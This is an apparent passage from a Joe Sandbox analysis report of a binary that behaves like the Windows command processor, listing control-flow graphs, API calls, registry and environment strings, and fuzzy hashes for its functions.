7ff755cbefc8-7ff755cbefcf 423->426 427 7ff755cbefde-7ff755cbefe9 423->427 428 7ff755cbefff-7ff755cbf009 424->428 429 7ff755cbf035-7ff755cbf03f 425->429 430 7ff755cb539c-7ff755cb53be GetLocaleInfoW 425->430 426->427 434 7ff755cbefd1-7ff755cbefdc 426->434 427->424 435 7ff755cbf021-7ff755cbf02c 428->435 436 7ff755cbf00b-7ff755cbf012 428->436 433 7ff755cbf042-7ff755cbf04c 429->433 431 7ff755cb53c4-7ff755cb53e6 GetLocaleInfoW 430->431 432 7ff755cbf078-7ff755cbf082 430->432 438 7ff755cbf0bb-7ff755cbf0c5 431->438 439 7ff755cb53ec-7ff755cb540e GetLocaleInfoW 431->439 442 7ff755cbf085-7ff755cbf08f 432->442 440 7ff755cbf064-7ff755cbf06f 433->440 441 7ff755cbf04e-7ff755cbf055 433->441 434->423 434->427 
435->429 436->435 437 7ff755cbf014-7ff755cbf01f 436->437 437->428 437->435 443 7ff755cbf0c8-7ff755cbf0d2 438->443 444 7ff755cb5414-7ff755cb5436 GetLocaleInfoW 439->444 445 7ff755cbf0fe-7ff755cbf108 439->445 440->432 441->440 446 7ff755cbf057-7ff755cbf062 441->446 447 7ff755cbf091-7ff755cbf098 442->447 448 7ff755cbf0a7-7ff755cbf0b2 442->448 449 7ff755cbf0d4-7ff755cbf0db 443->449 450 7ff755cbf0ea-7ff755cbf0f5 443->450 451 7ff755cbf141-7ff755cbf14b 444->451 452 7ff755cb543c-7ff755cb545e GetLocaleInfoW 444->452 453 7ff755cbf10b-7ff755cbf115 445->453 446->433 446->440 447->448 454 7ff755cbf09a-7ff755cbf0a5 447->454 448->438 449->450 455 7ff755cbf0dd-7ff755cbf0e8 449->455 450->445 460 7ff755cbf14e-7ff755cbf158 451->460 456 7ff755cbf184-7ff755cbf18b 452->456 457 7ff755cb5464-7ff755cb5486 GetLocaleInfoW 452->457 458 7ff755cbf117-7ff755cbf11e 453->458 459 7ff755cbf12d-7ff755cbf138 453->459 454->442 454->448 455->443 455->450 461 7ff755cbf18e-7ff755cbf198 456->461 462 7ff755cbf1c4-7ff755cbf1ce 457->462 463 7ff755cb548c-7ff755cb54ae GetLocaleInfoW 457->463 458->459 464 7ff755cbf120-7ff755cbf12b 458->464 459->451 465 7ff755cbf170-7ff755cbf17b 460->465 466 7ff755cbf15a-7ff755cbf161 460->466 467 7ff755cbf1b0-7ff755cbf1bb 461->467 468 7ff755cbf19a-7ff755cbf1a1 461->468 471 7ff755cbf1d1-7ff755cbf1db 462->471 469 7ff755cb54b4-7ff755cb54f5 setlocale call 7ff755cb8f80 463->469 470 7ff755cbf207-7ff755cbf20e 463->470 464->453 464->459 465->456 466->465 472 7ff755cbf163-7ff755cbf16e 466->472 467->462 468->467 473 7ff755cbf1a3-7ff755cbf1ae 468->473 477 7ff755cbf211-7ff755cbf21b 470->477 475 7ff755cbf1f3-7ff755cbf1fe 471->475 476 7ff755cbf1dd-7ff755cbf1e4 471->476 472->460 472->465 473->461 473->467 475->470 476->475 479 7ff755cbf1e6-7ff755cbf1f1 476->479 480 7ff755cbf233-7ff755cbf23e 477->480 481 7ff755cbf21d-7ff755cbf224 477->481 479->471 479->475 481->480 482 7ff755cbf226-7ff755cbf231 481->482 482->477 482->480
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: InfoLocale$DefaultUsersetlocale
                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                      • API String ID: 1351325837-2236139042
                                      • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                      • Instruction ID: 9fac823f83673bf4297bfa265f0e0e737c13d808f698f67aa97ed36ac6030f74
                                      • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                      • Instruction Fuzzy Hash: 3DF138BAB0868385EE51AF15E9102B9B3A4BF45F98FD84135CA0D577A4EF3CE905C320

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 483 7ff755cb4224-7ff755cb42a5 InitializeProcThreadAttributeList 484 7ff755cbecd4-7ff755cbecee GetLastError call 7ff755cc9eec 483->484 485 7ff755cb42ab-7ff755cb42e5 UpdateProcThreadAttribute 483->485 492 7ff755cbed1e 484->492 487 7ff755cbecf0-7ff755cbed19 GetLastError call 7ff755cc9eec DeleteProcThreadAttributeList 485->487 488 7ff755cb42eb-7ff755cb43c6 memset * 2 GetStartupInfoW call 7ff755cb3a90 call 7ff755cab900 485->488 487->492 497 7ff755cb4638-7ff755cb4644 _local_unwind 488->497 498 7ff755cb43cc-7ff755cb43d3 488->498 499 7ff755cb4649-7ff755cb4650 497->499 498->499 500 7ff755cb43d9-7ff755cb43dc 498->500 499->500 501 7ff755cb4656-7ff755cb465d 499->501 502 7ff755cb4415-7ff755cb4424 call 7ff755cb5a68 500->502 503 7ff755cb43de-7ff755cb43f5 wcsrchr 500->503 501->502 505 7ff755cb4663 501->505 510 7ff755cb4589-7ff755cb4590 502->510 511 7ff755cb442a-7ff755cb4486 CreateProcessW 502->511 503->502 504 7ff755cb43f7-7ff755cb440f lstrcmpW 503->504 504->502 507 7ff755cb4668-7ff755cb466d call 7ff755cc9044 504->507 505->500 507->502 510->511 514 7ff755cb4596-7ff755cb45fa CreateProcessAsUserW 510->514 513 7ff755cb448b-7ff755cb448f 511->513 515 7ff755cb4672-7ff755cb4682 GetLastError 513->515 516 7ff755cb4495-7ff755cb44c7 CloseHandle call 7ff755cb498c 513->516 514->513 518 7ff755cb468d-7ff755cb4694 515->518 516->518 522 7ff755cb44cd-7ff755cb44e5 516->522 520 7ff755cb46a2-7ff755cb46ac 518->520 521 7ff755cb4696-7ff755cb46a0 518->521 523 7ff755cb46ae-7ff755cb46b5 call 7ff755cb97bc 520->523 526 7ff755cb4705-7ff755cb4707 520->526 521->520 521->523 524 7ff755cb47a3-7ff755cb47a9 522->524 525 7ff755cb44eb-7ff755cb44f2 522->525 541 7ff755cb4703 523->541 542 7ff755cb46b7-7ff755cb4701 call 7ff755cfc038 523->542 528 7ff755cb45ff-7ff755cb4607 525->528 529 7ff755cb44f8-7ff755cb4507 525->529 526->522 527 7ff755cb470d-7ff755cb472a call 7ff755cacd90 526->527 543 7ff755cb473d-7ff755cb4767 call 7ff755cb13e0 call 7ff755cc9eec call 7ff755caff70 
_local_unwind 527->543 544 7ff755cb472c-7ff755cb4738 _local_unwind 527->544 528->529 532 7ff755cb460d 528->532 533 7ff755cb4612-7ff755cb4616 529->533 534 7ff755cb450d-7ff755cb4553 call 7ff755cb5cb4 call 7ff755cb33f0 call 7ff755cb498c 529->534 537 7ff755cb476c-7ff755cb4773 532->537 539 7ff755cb47d7-7ff755cb47df 533->539 540 7ff755cb461c-7ff755cb4633 533->540 564 7ff755cb4558-7ff755cb455e 534->564 537->529 548 7ff755cb4779-7ff755cb4780 537->548 545 7ff755cb47e1-7ff755cb47ed CloseHandle 539->545 546 7ff755cb47f2-7ff755cb483c call 7ff755caff70 DeleteProcThreadAttributeList call 7ff755cb8f80 539->546 540->546 541->526 542->526 543->537 544->543 545->546 548->529 550 7ff755cb4786-7ff755cb4789 548->550 550->529 556 7ff755cb478f-7ff755cb4792 550->556 556->524 560 7ff755cb4794-7ff755cb479d call 7ff755cca250 556->560 560->524 560->529 567 7ff755cb4564-7ff755cb4579 call 7ff755cb498c 564->567 568 7ff755cb47ae-7ff755cb47ca call 7ff755cb33f0 564->568 567->546 576 7ff755cb457f-7ff755cb4584 call 7ff755cca920 567->576 568->539 576->546
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h

                                      Control-flow Graph

                                      Control-flow graph for the function starting at 7ff755cb5554 (block edges omitted; executed and not-executed blocks were colour-coded in the original graph). API calls shown in the graph: RegOpenKeyExW, RegQueryValueExW, RegCloseKey, _wtol, wcstol, time, srand, ExpandEnvironmentStringsW.
                                      Similarity
                                      • API ID: QueryValue$CloseOpensrandtime
                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor

                                      Control-flow Graph

                                      Control-flow graph for the function starting at 7ff755cb37d8 (block edges omitted; executed and not-executed blocks were colour-coded in the original graph). API calls shown in the graph: GetCurrentThreadId, OpenThread, HeapSetInformation, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetConsoleOutputCP, GetCPInfo, GetThreadLocale, memset, _setjmp, _setmode.
                                      Similarity
                                      • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System

                                      Control-flow Graph

                                      Control-flow graph for the function starting at 7ff755cb823c (block edges omitted; executed and not-executed blocks were colour-coded in the original graph). API calls shown in the graph: FindFirstFileExW, FindNextFileW, FindClose, GetLastError, GetProcessHeap, HeapAlloc, HeapReAlloc.
                                      Similarity
                                      • API ID: ErrorFileFindFirstLast

                                      Control-flow Graph

                                      Control-flow graph for the function starting at 7ff755cb2978 (block edges omitted; executed and not-executed blocks were colour-coded in the original graph). API calls shown in the graph: FindFirstFileW, FindClose, _wcsnicmp, _wcsicmp, memmove.

                                      Control-flow Graph

                                      Control-flow graph for the function starting at 7ff755cb4d5c (block edges omitted; executed and not-executed blocks were colour-coded in the original graph). API calls shown in the graph: InitializeCriticalSection, SetConsoleCtrlHandler, _get_osfhandle, GetConsoleMode, GetCommandLineW, GetWindowsDirectoryW, GetConsoleOutputCP, GetCPInfo, GetProcessHeap, HeapAlloc, GetConsoleTitleW, GetStdHandle, GetConsoleScreenBufferInfo, GlobalFree, GetModuleHandleW, GetProcAddress, free.
                                      APIs
                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4D9A
                                        • Part of subcall function 00007FF755CB58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF755CCC6DB), ref: 00007FF755CB58EF
                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4DBB
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CB4DCA
                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4DE0
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CB4DEE
                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4E04
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB0589
                                        • Part of subcall function 00007FF755CB0580: SetConsoleMode.KERNELBASE ref: 00007FF755CB059E
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB05AF
                                        • Part of subcall function 00007FF755CB0580: GetConsoleMode.KERNELBASE ref: 00007FF755CB05C5
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB05EF
                                        • Part of subcall function 00007FF755CB0580: GetConsoleMode.KERNELBASE ref: 00007FF755CB0605
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB0632
                                        • Part of subcall function 00007FF755CB0580: SetConsoleMode.KERNELBASE ref: 00007FF755CB0647
                                        • Part of subcall function 00007FF755CB4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A28
                                        • Part of subcall function 00007FF755CB4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A66
                                        • Part of subcall function 00007FF755CB4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A7D
                                        • Part of subcall function 00007FF755CB4A14: memmove.MSVCRT(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A9A
                                        • Part of subcall function 00007FF755CB4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4AA2
                                        • Part of subcall function 00007FF755CB4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AD6
                                        • Part of subcall function 00007FF755CB4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AEF
                                        • Part of subcall function 00007FF755CB5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF755CB4E35), ref: 00007FF755CB55DA
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB5623
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB5667
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB56BE
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB5702
                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4E35
                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4E81
                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4F69
                                      • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4F95
                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FB0
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FC1
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FD8
                                      • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FF8
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB5037
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB504B
                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB50DF
                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB50F2
                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB510F
                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB5130
                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB514A
                                      • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB5175
                                        • Part of subcall function 00007FF755CB3578: _get_osfhandle.MSVCRT ref: 00007FF755CB3584
                                        • Part of subcall function 00007FF755CB3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB359C
                                        • Part of subcall function 00007FF755CB3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35C3
                                        • Part of subcall function 00007FF755CB3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35D9
                                        • Part of subcall function 00007FF755CB3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35ED
                                        • Part of subcall function 00007FF755CB3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB3602
                                      Similarity
                                      • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                      • API String ID: 1049357271-3021193919
                                      • Opcode ID: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                      • Instruction ID: 34fd07a89923f737413449967e35eeeeec52b77dd5d007abf6ac500ea12b64b1
                                      • Opcode Fuzzy Hash: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                      • Instruction Fuzzy Hash: 1CC152FBA08A8386EA40BB11E854179F7A1FF85F99FCC4135D90E47791EF3CA8458260

                                       Control-flow Graph
                                       (rendered graph not reproduced; the executed/not-executed colouring is lost in extraction)
                                       • Function: 7ff755cb3c24 (basic blocks 7ff755cb3c24-7ff755cb415b, error paths at 7ff755cbec5a-7ff755cbeca1)
                                       • APIs on the graph: GetCurrentDirectoryW, towupper, iswalpha, GetFullPathNameW, GetFileAttributesW, SetCurrentDirectoryW, GetLastError, _local_unwind
                                       • Internal calls: 7ff755caaf14, 7ff755caca40, 7ff755cab900, 7ff755cb855c, 7ff755cba5d6, 7ff755cb2978, 7ff755cb498c, 7ff755cb417c, 7ff755caff70, 7ff755cb8f80
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                      • String ID: :
                                      • API String ID: 1809961153-336475711
                                      • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                      • Instruction ID: fa62394016a20937b2aca496992eb8b8f9b151329572276e60d126a9a8bc4680
                                      • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                      • Instruction Fuzzy Hash: B9D16FABA0CB8691EA60EB15E4542B9F7A1FB84F58FC84135D98E437A4DF3CE944C710

                                       Control-flow Graph
                                       (rendered graph not reproduced; the executed/not-executed colouring is lost in extraction)
                                       • Function: 7ff755cb2394 (basic blocks 7ff755cb2394-7ff755cb2529, cold path at 7ff755cbe0d2-7ff755cbe2c3)
                                       • APIs on the graph: memset, GetModuleFileNameW, _wcsupr, wcschr, wcsrchr, _wcsicmp, ??_V@YAXPEAX@Z
                                       • Internal calls: 7ff755caca40, 7ff755cb4c1c, 7ff755cb081c (called repeatedly, each time with 7ff755cb498c on the failure edge), 7ff755cb3c24 (the function graphed above), 7ff755cb1300, 7ff755cb8f80
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                      • API String ID: 2622545777-4197029667
                                      • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                      • Instruction ID: 1cdace2bd3fe6f00d5ef111cbce25f000504adc8c12956f338fceb3a4db3fe2b
                                      • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                      • Instruction Fuzzy Hash: 359172BBB09A8785EE64AB50D8502B8A3A5FF49F98FC84135C94E47695DF3CE905C320

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleMode_get_osfhandle
                                      • String ID: CMD.EXE
                                      • API String ID: 1606018815-3025314500
                                      • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                      • Instruction ID: 8baecc15e49cd004b83f18b21d64bf2d2e5a56cc4aa177d0c769905f067ba7ba
                                      • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                      • Instruction Fuzzy Hash: ED41F3BAA09683CBE7456B15E845178FBA1FF89F59FCC4139C90E87360DF3CA4148660

                                       Control-flow Graph
                                       (rendered graph not reproduced; the executed/not-executed colouring is lost in extraction)
                                       • Function: 7ff755cac620 (basic blocks 7ff755cac620-7ff755caca2f, cold path at 7ff755cbc5de-7ff755cbc6da)
                                       • APIs on the graph: GetConsoleTitleW, GetLastError, towupper, SetConsoleTitleW, wcsncmp, wcschr
                                       • Internal calls: 7ff755caaf14, 7ff755caca40, 7ff755ca3278, 7ff755cb855c, 7ff755cab9c0, 7ff755cb291c, 7ff755ca89c0 (the GetDriveTypeW/GetVolumeInformationW function graphed below), 7ff755cb5c6c, 7ff755cad3f0, 7ff755ccec14, 7ff755cb8f80, 7ff755cabd38, 7ff755cacb40, 7ff755cacad4, 7ff755cb9158
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleTitlewcschr
                                      • String ID: /$:
                                      • API String ID: 2364928044-4222935259
                                      • Opcode ID: 989dfed76e83e1e5127155f56046364be98515c6956e9669bb0cf7002a0e13e4
                                      • Instruction ID: 2533290812a217f91998278a9da034bce6f7e06ef9d7a21e0825d9dddc855f55
                                      • Opcode Fuzzy Hash: 989dfed76e83e1e5127155f56046364be98515c6956e9669bb0cf7002a0e13e4
                                      • Instruction Fuzzy Hash: 94C19EEBE0864381EA64BB25D4142B9A6A0FF81F98FCC5531E91E472D5EF3CE845D320

                                       Control-flow Graph
                                       (rendered graph not reproduced; the executed/not-executed colouring is lost in extraction)
                                       • Function: 7ff755cb8d80 (basic blocks 7ff755cb8d80-7ff755cb8f3d)
